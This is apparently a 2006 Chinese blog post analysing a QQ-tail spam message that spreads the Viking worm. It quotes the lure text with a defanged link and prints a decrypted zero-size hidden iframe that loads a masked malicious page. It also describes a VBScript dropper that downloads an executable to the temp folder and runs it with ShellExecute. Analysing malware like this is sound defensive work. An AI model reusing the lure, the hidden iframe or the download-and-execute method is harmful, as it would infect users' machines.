传播蠕虫维金/Worm.Viking.cx的QQ尾巴再添花样

endurer 原创
2006-10-08 第 1

QQ自动发送的信息为:
/--------
看看我最近的照片~~~ 才扫描到Q-Zone空间上的。是不是有点太露了....

hxxp://Q-Zone.***QQ.C0M.%34%76%30***%2E%63%6E/**Photo/Cgi_Bin&387**381/
--------/

点击该链接打开的网页首部有用自定义函数 psw()加密的JavaScript脚本代码。解密后为:
/--------
<iframe src=hxxp://web***1.39***com.org/m***s/mm***.htm width=0 height=0></iframe>
--------/

mm***.htm  的开头为 HTMLShip 加密的脚本程序,分为两个部分:
前一部分 解密后的代码为JavaScript编写,解密后的代码如下:
/--------
 <script language=javascript>yS6=5633;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};oK74=3345;dI39=7346;function _dws(){window.status = "The page is protected by HTMLShip XP";setTimeout("_dws()",100);};_dws();kY53=6773;jQ9=4206;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();iD69=5348;kH81=489;aS87=3348;mY34=4488;lL93=5630;bI58=9632;sT64=2490;;_licensed_to_="TEAM";</script><html>
--------/

后一部分 使用的是VBScript,其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把 hxxp://web***1.3***9com.org/m***s/mm***1.exe 保存为 %temp%/g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法来运行。


Kaspersky 报为 Worm.Win32.Viking.yhttp://www.viruslist.com/en/find?words=Worm.Win32.Viking.y
瑞星报为 Worm.Viking.cx。 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值